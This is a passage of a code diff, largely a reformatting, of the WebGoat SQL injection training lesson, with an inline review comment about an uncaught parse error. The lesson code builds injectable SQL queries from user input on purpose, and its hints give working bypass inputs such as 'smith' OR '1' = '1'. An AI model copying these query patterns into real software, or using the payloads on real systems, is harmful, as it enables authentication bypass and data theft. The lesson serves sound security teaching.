SQLInjection.USER_ID, userId); + authenticated = true; + } + } catch (SQLException sqle) + { + s.setMessage("Error logging in"); + sqle.printStackTrace(); + } + } catch (Exception e) { - setSessionAttribute(s, - getLessonName() + ".isAuthenticated", Boolean.TRUE); - setSessionAttribute(s, getLessonName() + "." 
- + SQLInjection.USER_ID, userId); - authenticated = true; + s.setMessage("Error logging in"); + e.printStackTrace(); } - } - catch (SQLException sqle) - { - s.setMessage("Error logging in"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error logging in"); - e.printStackTrace(); + + // System.out.println("Lesson login result: " + authenticated); + return authenticated; } - //System.out.println("Lesson login result: " + authenticated); - return authenticated; - } - - - public boolean login_BACKUP(WebSession s, String userId, String password) - { - //System.out.println("Logging in to lesson"); - boolean authenticated = false; - - try + public boolean login_BACKUP(WebSession s, String userId, String password) { - String query = "SELECT * FROM employee WHERE userid = " + userId - + " and password = '" + password + "'"; - //System.out.println("Query:" + query); - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - if (answer_results.first()) + // System.out.println("Logging in to lesson"); + boolean authenticated = false; + + try { - setSessionAttribute(s, - getLessonName() + ".isAuthenticated", Boolean.TRUE); - setSessionAttribute(s, getLessonName() + "." - + SQLInjection.USER_ID, userId); - authenticated = true; - } + String query = "SELECT * FROM employee WHERE userid = " + userId + " and password = '" + password + "'"; + // System.out.println("Query:" + query); + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + if (answer_results.first()) + { + setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.TRUE); + setSessionAttribute(s, getLessonName() + "." 
+ SQLInjection.USER_ID, userId); + authenticated = true; + } - } - catch (SQLException sqle) - { - s.setMessage("Error logging in"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error logging in"); - e.printStackTrace(); - } - - //System.out.println("Lesson login result: " + authenticated); - return authenticated; - } - - - public List getAllEmployees(WebSession s) - { - List employees = new Vector(); - - // Query the database for all roles the given employee belongs to - // Query the database for all employees "owned" by these roles - - try - { - String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles " - + "where employee.userid=roles.userid"; - - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - answer_results.beforeFirst(); - while (answer_results.next()) + } catch (SQLException sqle) + { + s.setMessage("Error logging in"); + sqle.printStackTrace(); + } + } catch (Exception e) { - int employeeId = answer_results.getInt("userid"); - String firstName = answer_results.getString("first_name"); - String lastName = answer_results.getString("last_name"); - String role = answer_results.getString("role"); - EmployeeStub stub = new EmployeeStub(employeeId, firstName, - lastName, role); - employees.add(stub); + s.setMessage("Error logging in"); + e.printStackTrace(); } - } - catch (SQLException sqle) - { - s.setMessage("Error getting employees"); - sqle.printStackTrace(); - } + + // System.out.println("Lesson login result: " + authenticated); + return authenticated; } - catch (Exception e) + + public List getAllEmployees(WebSession s) { - s.setMessage("Error getting employees"); - e.printStackTrace(); + List employees = new Vector(); + + // Query the database for all roles the given employee belongs to + // Query the database for all employees 
"owned" by these roles + + try + { + String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles " + + "where employee.userid=roles.userid"; + + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + answer_results.beforeFirst(); + while (answer_results.next()) + { + int employeeId = answer_results.getInt("userid"); + String firstName = answer_results.getString("first_name"); + String lastName = answer_results.getString("last_name"); + String role = answer_results.getString("role"); + EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role); + employees.add(stub); + } + } catch (SQLException sqle) + { + s.setMessage("Error getting employees"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employees"); + e.printStackTrace(); + } + + return employees; } - return employees; - } - - - private void updateLessonStatus(WebSession s) - { - try + private void updateLessonStatus(WebSession s) { - String employeeId = s.getParser().getStringParameter( - SQLInjection.EMPLOYEE_ID); - String password = s.getParser().getRawParameter( - SQLInjection.PASSWORD); - String stage = getStage(s); - if (SQLInjection.STAGE1.equals(stage)) - { - if (Integer.parseInt(employeeId) == SQLInjection.PRIZE_EMPLOYEE_ID - && isAuthenticated(s)) - { - setStageComplete(s, SQLInjection.STAGE1); - } - } - else if (SQLInjection.STAGE2.equals(stage)) - { - // This assumes the student hasn't modified login_BACKUP(). 
- if (Integer.parseInt(employeeId) == SQLInjection.PRIZE_EMPLOYEE_ID - && !isAuthenticated(s) - && login_BACKUP(s, employeeId, password)) - { - setStageComplete(s, SQLInjection.STAGE2); - } - } + try + { + String employeeId = s.getParser().getStringParameter(SQLInjection.EMPLOYEE_ID); + String password = s.getParser().getRawParameter(SQLInjection.PASSWORD); + String stage = getStage(s); + if (SQLInjection.STAGE1.equals(stage)) + { + if (Integer.parseInt(employeeId) == SQLInjection.PRIZE_EMPLOYEE_ID && isAuthenticated(s)) + { + setStageComplete(s, SQLInjection.STAGE1); + } + } + else if (SQLInjection.STAGE2.equals(stage)) + { + // This assumes the student hasn't modified login_BACKUP(). + if (Integer.parseInt(employeeId) == SQLInjection.PRIZE_EMPLOYEE_ID && !isAuthenticated(s) + && login_BACKUP(s, employeeId, password)) + { + setStageComplete(s, SQLInjection.STAGE2); + } + } + } catch (ParameterNotFoundException pnfe) + { + } } - catch (ParameterNotFoundException pnfe) - {} - } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java index fac41d1b1..055077ec2 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons.SQLInjection; import java.util.ArrayList; 
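Review bot: `updateLessonStatus` catches only `ParameterNotFoundException`, but `Integer.parseInt(employeeId)` in both stage branches throws an unchecked `NumberFormatException` whenever the submitted employee id is not numeric, and nothing in `handleRequest` catches it either, so such a request escapes the action as a server error instead of being treated as a failed login. `login` has already run and swallowed its own errors by the time this method is reached, so the parse needs the same protection: add `} catch (NumberFormatException nfe) { // a non-numeric id cannot be the prize employee }` beside the existing catch. That existing `catch (ParameterNotFoundException pnfe) { }` is empty; give it a one-line reason such as `// no credentials submitted, nothing to grade` so the swallow reads as intentional. The concatenated query in `login` appears to be the exercise itself (the STAGE2 check deliberately relies on `login_BACKUP` as an unmodified reference), so it is not raised here.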
@@ -18,249 +19,230 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class SQLInjection extends GoatHillsFinancial { - private final static Integer DEFAULT_RANKING = new Integer(75); + private final static Integer DEFAULT_RANKING = new Integer(75); - public final static int PRIZE_EMPLOYEE_ID = 112; + public final static int PRIZE_EMPLOYEE_ID = 112; - public final static String PRIZE_EMPLOYEE_NAME = "Neville Bartholomew"; + public final static String PRIZE_EMPLOYEE_NAME = "Neville Bartholomew"; - public final static String STAGE1 = "String SQL Injection"; - - public final static String STAGE2 = "Parameterized Query #1"; - - public final static String STAGE3 = "Numeric SQL Injection"; - - public final static String STAGE4 = "Parameterized Query #2"; - - public void registerActions(String className) - { - registerAction(new ListStaff(this, className, LISTSTAFF_ACTION)); - registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION)); - registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION)); - registerAction(new EditProfile(this, className, EDITPROFILE_ACTION)); - registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION)); + public final static String STAGE1 = "String SQL Injection"; - // These actions are special in that they chain to other actions. 
- registerAction(new Login(this, className, LOGIN_ACTION, - getAction(LISTSTAFF_ACTION))); - registerAction(new Logout(this, className, LOGOUT_ACTION, - getAction(LOGIN_ACTION))); - registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, - getAction(VIEWPROFILE_ACTION))); - registerAction(new UpdateProfile(this, className, - UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); - registerAction(new DeleteProfile(this, className, - DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION))); - } + public final static String STAGE2 = "Parameterized Query #1"; - /** - * Gets the category attribute of the CrossSiteScripting object - * - * @return The category value - */ - public Category getDefaultCategory() - { - return Category.INJECTION; - } + public final static String STAGE3 = "Numeric SQL Injection"; - /** - * Gets the hints attribute of the DirectoryScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints - .add("The application is taking your input and inserting it at the end of a pre-formed SQL command."); - hints - .add("This is the code for the query being built and issued by WebGoat:

" - + "\"SELECT * FROM employee WHERE userid = \" + userId + \" and password = \" + password"); - hints - .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. " - + "Try appending a SQL statement that always resolves to true"); + public final static String STAGE4 = "Parameterized Query #2"; - // Stage 1 - hints - .add("You may need to use WebScarab to remove a field length limit to fit your attack."); - hints.add("Try entering a password of [ smith' OR '1' = '1 ]."); + public void registerActions(String className) + { + registerAction(new ListStaff(this, className, LISTSTAFF_ACTION)); + registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION)); + registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION)); + registerAction(new EditProfile(this, className, EDITPROFILE_ACTION)); + registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION)); - // Stage 2 - hints - .add("Many of WebGoat's database queries are already parameterized. Search the project for PreparedStatement."); - - // Stage 3 - hints - .add("Try entering an employee_id of [ 101 OR 1=1 ORDER BY 'salary' ]."); - - // Stage 4 - - return hints; - } - - @Override - public String[] getStages() { - if (getWebgoatContext().isCodingExercises()) - return new String[] {STAGE1, STAGE2, STAGE3, STAGE4}; - return new String[] {STAGE1, STAGE3}; + // These actions are special in that they chain to other actions. 
+ registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION))); + registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION))); + registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); + registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); + registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION))); } - /** - * Gets the instructions attribute of the ParameterInjection object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - String instructions = ""; - - if (!getLessonTracker(s).getCompleted()) + /** + * Gets the category attribute of the CrossSiteScripting object + * + * @return The category value + */ + public Category getDefaultCategory() { - String stage = getStage(s); - if (STAGE1.equals(stage)) - { - instructions = "Stage 1: Use String SQL Injection to bypass authentication. " - + "Use SQL injection to log in as the boss ('Neville') without using the correct password. " - + "Verify that Neville's profile can be viewed and that all functions are available (including Search, Create, and Delete)."; - } - else if (STAGE2.equals(stage)) + return Category.INJECTION; + } + + /** + * Gets the hints attribute of the DirectoryScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command."); + hints.add("This is the code for the query being built and issued by WebGoat:

" + + "\"SELECT * FROM employee WHERE userid = \" + userId + \" and password = \" + password"); + hints.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. " + + "Try appending a SQL statement that always resolves to true"); + + // Stage 1 + hints.add("You may need to use WebScarab to remove a field length limit to fit your attack."); + hints.add("Try entering a password of [ smith' OR '1' = '1 ]."); + + // Stage 2 + hints + .add("Many of WebGoat's database queries are already parameterized. Search the project for PreparedStatement."); + + // Stage 3 + hints.add("Try entering an employee_id of [ 101 OR 1=1 ORDER BY 'salary' ]."); + + // Stage 4 + + return hints; + } + + @Override + public String[] getStages() + { + if (getWebgoatContext().isCodingExercises()) return new String[] { STAGE1, STAGE2, STAGE3, STAGE4 }; + return new String[] { STAGE1, STAGE3 }; + } + + /** + * Gets the instructions attribute of the ParameterInjection object + * + * @return The instructions value + */ + public String getInstructions(WebSession s) + { + String instructions = ""; + + if (!getLessonTracker(s).getCompleted()) { - instructions = "Stage 2: Block SQL Injection using a Parameterized Query.
" - + "Implement a fix to block SQL injection into the fields in question on the Login page. " - + "Repeat stage 1. Verify that the attack is no longer effective."; + String stage = getStage(s); + if (STAGE1.equals(stage)) + { + instructions = "Stage 1: Use String SQL Injection to bypass authentication. " + + "Use SQL injection to log in as the boss ('Neville') without using the correct password. " + + "Verify that Neville's profile can be viewed and that all functions are available (including Search, Create, and Delete)."; + } + else if (STAGE2.equals(stage)) + { + instructions = "Stage 2: Block SQL Injection using a Parameterized Query.
" + + "Implement a fix to block SQL injection into the fields in question on the Login page. " + + "Repeat stage 1. Verify that the attack is no longer effective."; + } + else if (STAGE3.equals(stage)) + { + instructions = "Stage 3: Execute SQL Injection to bypass authorization.
" + + "As regular employee 'Larry', use SQL injection into a parameter of the View function " + + "(from the List Staff page) to view the profile of the boss ('Neville')."; + } + else if (STAGE4.equals(stage)) + { + instructions = "Stage 4: Block SQL Injection using a Parameterized Query.
" + + "Implement a fix to block SQL injection into the relevant parameter. " + + "Repeat stage 3. Verify that access to Neville's profile is properly blocked."; + } } - else if (STAGE3.equals(stage)) + + return instructions; + } + + public void handleRequest(WebSession s) + { + if (s.getLessonSession(this) == null) s.openLessonSession(this); + + String requestedActionName = null; + try { - instructions = "Stage 3: Execute SQL Injection to bypass authorization.
" - + "As regular employee 'Larry', use SQL injection into a parameter of the View function " - + "(from the List Staff page) to view the profile of the boss ('Neville')."; + requestedActionName = s.getParser().getStringParameter("action"); + } catch (ParameterNotFoundException pnfe) + { + // Let them eat login page. + requestedActionName = LOGIN_ACTION; } - else if (STAGE4.equals(stage)) + + if (requestedActionName != null) { - instructions = "Stage 4: Block SQL Injection using a Parameterized Query.
" - + "Implement a fix to block SQL injection into the relevant parameter. " - + "Repeat stage 3. Verify that access to Neville's profile is properly blocked."; - } - } - - return instructions; - } - - public void handleRequest(WebSession s) - { - if (s.getLessonSession(this) == null) - s.openLessonSession(this); - - String requestedActionName = null; - try - { - requestedActionName = s.getParser().getStringParameter("action"); - } - catch (ParameterNotFoundException pnfe) - { - // Let them eat login page. - requestedActionName = LOGIN_ACTION; - } - - if (requestedActionName != null) - { - try - { - LessonAction action = getAction(requestedActionName); - if (action != null) - { - //System.out.println("CrossSiteScripting.handleRequest() dispatching to: " + action.getActionName()); - if (!action.requiresAuthentication() - || action.isAuthenticated(s)) - { - action.handleRequest(s); - //setCurrentAction(s, action.getNextPage(s)); - } + try + { + LessonAction action = getAction(requestedActionName); + if (action != null) + { + // System.out.println("CrossSiteScripting.handleRequest() dispatching to: " + + // action.getActionName()); + if (!action.requiresAuthentication() || action.isAuthenticated(s)) + { + action.handleRequest(s); + // setCurrentAction(s, action.getNextPage(s)); + } + } + else + setCurrentAction(s, ERROR_ACTION); + } catch (ParameterNotFoundException pnfe) + { + System.out.println("Missing parameter"); + pnfe.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } catch (ValidationException ve) + { + System.out.println("Validation failed"); + ve.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } catch (UnauthenticatedException ue) + { + s.setMessage("Login failed"); + System.out.println("Authentication failure"); + ue.printStackTrace(); + } catch (UnauthorizedException ue2) + { + s.setMessage("You are not authorized to perform this function"); + System.out.println("Authorization failure"); + ue2.printStackTrace(); + } catch (Exception e) + 
{ + // All other errors send the user to the generic error page + System.out.println("handleRequest() error"); + e.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } } - else - setCurrentAction(s, ERROR_ACTION); - } - catch (ParameterNotFoundException pnfe) - { - System.out.println("Missing parameter"); - pnfe.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - catch (ValidationException ve) - { - System.out.println("Validation failed"); - ve.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - catch (UnauthenticatedException ue) - { - s.setMessage("Login failed"); - System.out.println("Authentication failure"); - ue.printStackTrace(); - } - catch (UnauthorizedException ue2) - { - s.setMessage("You are not authorized to perform this function"); - System.out.println("Authorization failure"); - ue2.printStackTrace(); - } - catch (Exception e) - { - // All other errors send the user to the generic error page - System.out.println("handleRequest() error"); - e.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } + + // All this does for this lesson is ensure that a non-null content exists. + setContent(new ElementContainer()); } - // All this does for this lesson is ensure that a non-null content exists. - setContent(new ElementContainer()); - } + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the title attribute of the CrossSiteScripting object - * - * @return The title value - */ - public String getTitle() - { - return "LAB: SQL Injection"; - } + /** + * Gets the title attribute of the CrossSiteScripting object + * + * @return The title value + */ + public String getTitle() + { + return "LAB: SQL Injection"; + } } 
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java
index ec93058f2..9d0bdd396 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons.SQLInjection;
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.session.Employee;
@@ -12,257 +12,217 @@ import org.owasp.webgoat.session.UnauthenticatedException; import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class ViewProfile extends DefaultLessonAction { - public ViewProfile(GoatHillsFinancial lesson, String lessonName, - String actionName) - { - super(lesson, lessonName, actionName); - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException - { - getLesson().setCurrentAction(s, getActionName()); - - Employee employee = null; - - if (isAuthenticated(s)) + public ViewProfile(GoatHillsFinancial lesson, String lessonName, String actionName) { - String userId = getSessionAttribute(s, getLessonName() + "." - + SQLInjection.USER_ID); - String employeeId = null; - try - { - // User selected employee - employeeId = s.getParser().getRawParameter( - SQLInjection.EMPLOYEE_ID); - } - catch (ParameterNotFoundException e) - { - // May be an internally selected employee - employeeId = getRequestAttribute(s, getLessonName() + "." - + SQLInjection.EMPLOYEE_ID); - } - - // FIXME: If this fails and returns null, ViewProfile.jsp will blow up as it expects an Employee. - // Most other JSP's can handle null session attributes. - employee = getEmployeeProfile(s, userId, employeeId); - // If employee==null redirect to the error page. - if (employee == null) - getLesson().setCurrentAction(s, SQLInjection.ERROR_ACTION); - else - setSessionAttribute(s, getLessonName() + "." 
- + SQLInjection.EMPLOYEE_ATTRIBUTE_KEY, employee); + super(lesson, lessonName, actionName); } - else - throw new UnauthenticatedException(); - updateLessonStatus(s, employee); - } - - - public String getNextPage(WebSession s) - { - return SQLInjection.VIEWPROFILE_ACTION; - } - - - public Employee getEmployeeProfile(WebSession s, String userId, - String subjectUserId) throws UnauthorizedException - { - Employee profile = null; - - // Query the database for the profile data of the given employee - try + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException { - String query = "SELECT employee.* " + - "FROM employee,ownership WHERE employee.userid = ownership.employee_id and " + - "ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId; + getLesson().setCurrentAction(s, getActionName()); - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - if (answer_results.next()) + Employee employee = null; + + if (isAuthenticated(s)) { - // Note: Do NOT get the password field. 
- profile = new Employee(answer_results.getInt("userid"), - answer_results.getString("first_name"), - answer_results.getString("last_name"), - answer_results.getString("ssn"), answer_results - .getString("title"), answer_results - .getString("phone"), answer_results - .getString("address1"), answer_results - .getString("address2"), answer_results - .getInt("manager"), answer_results - .getString("start_date"), answer_results - .getInt("salary"), answer_results - .getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results - .getString("disciplined_date"), - answer_results.getString("disciplined_notes"), - answer_results.getString("personal_description")); - /* System.out.println("Retrieved employee from db: " + - profile.getFirstName() + " " + profile.getLastName() + - " (" + profile.getId() + ")"); - */} - } - catch (SQLException sqle) - { - s.setMessage("Error getting employee profile"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employee profile"); - e.printStackTrace(); - } - - return profile; - } - - - public Employee getEmployeeProfile_BACKUP(WebSession s, String userId, - String subjectUserId) throws UnauthorizedException - { - // Query the database to determine if this employee has access to this function - // Query the database for the profile data of the given employee if "owned" by the given user - - Employee profile = null; - - // Query the database for the profile data of the given employee - try - { - String query = "SELECT * FROM employee WHERE userid = " - + subjectUserId; - - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - if (answer_results.next()) - { - // Note: Do NOT get the password field. 
- profile = new Employee(answer_results.getInt("userid"), - answer_results.getString("first_name"), - answer_results.getString("last_name"), - answer_results.getString("ssn"), answer_results - .getString("title"), answer_results - .getString("phone"), answer_results - .getString("address1"), answer_results - .getString("address2"), answer_results - .getInt("manager"), answer_results - .getString("start_date"), answer_results - .getInt("salary"), answer_results - .getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results - .getString("disciplined_date"), - answer_results.getString("disciplined_notes"), - answer_results.getString("personal_description")); - /* System.out.println("Retrieved employee from db: " + - profile.getFirstName() + " " + profile.getLastName() + - " (" + profile.getId() + ")"); - */} - } - catch (SQLException sqle) - { - s.setMessage("Error getting employee profile"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employee profile"); - e.printStackTrace(); - } - - return profile; - } - - - private void updateLessonStatus(WebSession s, Employee employee) - { - try - { - String userId = getSessionAttribute(s, getLessonName() + "." - + SQLInjection.USER_ID); - String employeeId = s.getParser().getRawParameter( - SQLInjection.EMPLOYEE_ID); - String stage = getStage(s); - if (SQLInjection.STAGE3.equals(stage)) - { - // If the employee we are viewing is the prize and we are not authorized to have it, - // the stage is completed - if (employee != null - && employee.getId() == SQLInjection.PRIZE_EMPLOYEE_ID - && !isAuthorizedForEmployee(s, Integer - .parseInt(userId), employee.getId())) - { - setStageComplete(s, SQLInjection.STAGE3); - } - } - else if (SQLInjection.STAGE4.equals(stage)) - { - // If we were denied the employee to view, and we would have been able to view it - // in the broken state, the stage is completed. - // This assumes the student hasn't modified getEmployeeProfile_BACKUP(). 
- if (employee == null) - { - Employee targetEmployee = null; + String userId = getSessionAttribute(s, getLessonName() + "." + SQLInjection.USER_ID); + String employeeId = null; try { - targetEmployee = getEmployeeProfile_BACKUP(s, - userId, employeeId); - } - catch (UnauthorizedException e) - {} - if (targetEmployee != null - && targetEmployee.getId() == SQLInjection.PRIZE_EMPLOYEE_ID) + // User selected employee + employeeId = s.getParser().getRawParameter(SQLInjection.EMPLOYEE_ID); + } catch (ParameterNotFoundException e) { - setStageComplete(s, SQLInjection.STAGE4); + // May be an internally selected employee + employeeId = getRequestAttribute(s, getLessonName() + "." + SQLInjection.EMPLOYEE_ID); } - } - } + + // FIXME: If this fails and returns null, ViewProfile.jsp will blow up as it expects an + // Employee. + // Most other JSP's can handle null session attributes. + employee = getEmployeeProfile(s, userId, employeeId); + // If employee==null redirect to the error page. + if (employee == null) + getLesson().setCurrentAction(s, SQLInjection.ERROR_ACTION); + else + setSessionAttribute(s, getLessonName() + "." 
+ SQLInjection.EMPLOYEE_ATTRIBUTE_KEY, employee); + } + else + throw new UnauthenticatedException(); + + updateLessonStatus(s, employee); + } + + public String getNextPage(WebSession s) + { + return SQLInjection.VIEWPROFILE_ACTION; + } + + public Employee getEmployeeProfile(WebSession s, String userId, String subjectUserId) throws UnauthorizedException + { + Employee profile = null; + + // Query the database for the profile data of the given employee + try + { + String query = "SELECT employee.* " + + "FROM employee,ownership WHERE employee.userid = ownership.employee_id and " + + "ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId; + + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + if (answer_results.next()) + { + // Note: Do NOT get the password field. + profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), + answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results + .getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results + .getInt("manager"), answer_results.getString("start_date"), answer_results + .getInt("salary"), answer_results.getString("ccn"), answer_results + .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results + .getString("disciplined_notes"), answer_results.getString("personal_description")); + /* + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + + * profile.getLastName() + " (" + profile.getId() + ")"); + */} + } catch (SQLException sqle) + { + s.setMessage("Error getting employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employee profile"); + e.printStackTrace(); 
+ } + + return profile; + } + + public Employee getEmployeeProfile_BACKUP(WebSession s, String userId, String subjectUserId) + throws UnauthorizedException + { + // Query the database to determine if this employee has access to this function + // Query the database for the profile data of the given employee if "owned" by the given + // user + + Employee profile = null; + + // Query the database for the profile data of the given employee + try + { + String query = "SELECT * FROM employee WHERE userid = " + subjectUserId; + + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + if (answer_results.next()) + { + // Note: Do NOT get the password field. + profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), + answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results + .getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results + .getInt("manager"), answer_results.getString("start_date"), answer_results + .getInt("salary"), answer_results.getString("ccn"), answer_results + 